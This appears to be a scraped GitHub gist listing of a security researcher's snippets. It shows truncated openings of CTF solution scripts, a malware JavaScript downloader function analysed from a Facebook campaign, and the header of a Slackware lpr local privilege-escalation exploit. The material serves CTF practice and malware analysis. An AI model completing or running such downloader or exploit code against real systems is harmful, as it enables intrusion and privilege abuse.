Skip to content

Instantly share code, notes, and snippets.

Itay Cohen ITAYC0HEN

Block or report user

Report or block ITAYC0HEN

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ITAYC0HEN
ITAYC0HEN / cleanVersion.js
Created Jun 29, 2016
Facebook Malware (1st JS file) - June 2016
View cleanVersion.js
(function(p)
{
function downloader(url,dest,position)
{
if(!dest || !url)
{return null};
var _httpHandler=WScript.CreateObject("Msxml2.XMLhttp");
_httpHandler.onreadystatechange= function()
{
@ITAYC0HEN
ITAYC0HEN / RegexInjection.ps1
Created Aug 31, 2016
[CTF(x) 2016 : WEB] Harambehub – 100 pts
View RegexInjection.ps1
# Written by: Itay Cohen, Aug 2016
$lowercase = [char[]]([int][char]'a'..[int][char]'z')
$uppercase = [char[]]([int][char]'A'..[int][char]'Z')
$numbers = 0..9
$chars = $lowercase+$uppercase+$numbers
function RegexInjection($regex){
foreach($c in $chars)
{
@ITAYC0HEN
ITAYC0HEN / index.php
Last active Sep 4, 2016
[TWCTF 2016: Web] Global Page
View index.php
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
@ITAYC0HEN
ITAYC0HEN / palindrome.py
Last active Sep 5, 2016
[TWCTF-2016: PPC] Make a Palindrome!
View palindrome.py
# -*- coding:utf-8 -*-
# Server connection example file for Python 2
import socket
import sys
import random
import itertools
# My added data
def makepal(l):
for b in itertools.permutations(l, len(l)):
@ITAYC0HEN
ITAYC0HEN / SecuPrim.py
Last active Sep 12, 2016
[ASIS-CTF] SecuPrim
View SecuPrim.py
from pwn import *
from hashlib import *
import string
import itertools
from Crypto.Util.number import *
from sympy import perfect_power
import time
# Cout primes and perfect powers in a range
def countNumbers(lower,upper):
@ITAYC0HEN
ITAYC0HEN / index.php
Last active Sep 18, 2016
[CSAW 2016] mfw
View index.php
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
@ITAYC0HEN
ITAYC0HEN / coinslot.py
Created Sep 18, 2016
[CSAW 2016] Coinslot
View coinslot.py
from pwn import *
r = remote('misc.chal.csaw.io',8000)
# Create an array of dollars and coins values
money = [10000.0, 5000.0, 1000.0, 500.0, 100.0, 50.0, 20.0, 10.0, 5.0, 1.0, 0.5, 0.25, 0.1, 0.05, 0.01]
count = 0
while(True):
count += 1
@ITAYC0HEN
ITAYC0HEN / prdelka-vs-GNU-lpr.c
Created Dec 29, 2016
Slackware 1.01 local priv-esc exploit
View prdelka-vs-GNU-lpr.c
/*
Slackware Linux 1.01 "lpr" stack overflow privilege escalation
Usage:
slack:/tmp$ gcc prdelka-vs-GNU-lpr.c -o prdelka-vs-GNU-lpr
slack:/tmp$ ./prdelka-vs-GNU-lpr
Written by: prdelka
*/
#include <stdio.h>
@ITAYC0HEN
ITAYC0HEN / twin-primes.py
Last active Feb 3, 2017
[TWCTF-2016: Crypto] Twin Primes
View twin-primes.py
from sympy import *
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os
# n from key1
n1 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935184448638997877593781930103866416949585686541509642494048554242004100863315220430074997145531929128200885758274037875349539018669336263469803277281048657198114844413236754680549874472753528866434686048799833381542018876362229842605213500869709361657000044182573308825550237999139442040422107931857506897810951
# n from key2
n2 = 1940264376802796729448069536103722764963751456128046135270842019219732899351271085208787198634918438344203154494526396647744668558716802515477506017878289709799394980084590321889097527572541669925846292009798642493608854111279095887521133618824910728075366146761951107
@ITAYC0HEN
ITAYC0HEN / New_Avenger_solution.py
Created Mar 5, 2017
[Pragyan CTF] New Avenger writeup
View New_Avenger_solution.py
# Full Writeup: https://www.megabeets.net/pragyan-ctf-new-avenger
from zipfile import ZipFile
import string
passwords =[]
i = 1
while True:
f=reversed(open("%s_image.jpg"%i).readlines())
You can’t perform that action at this time.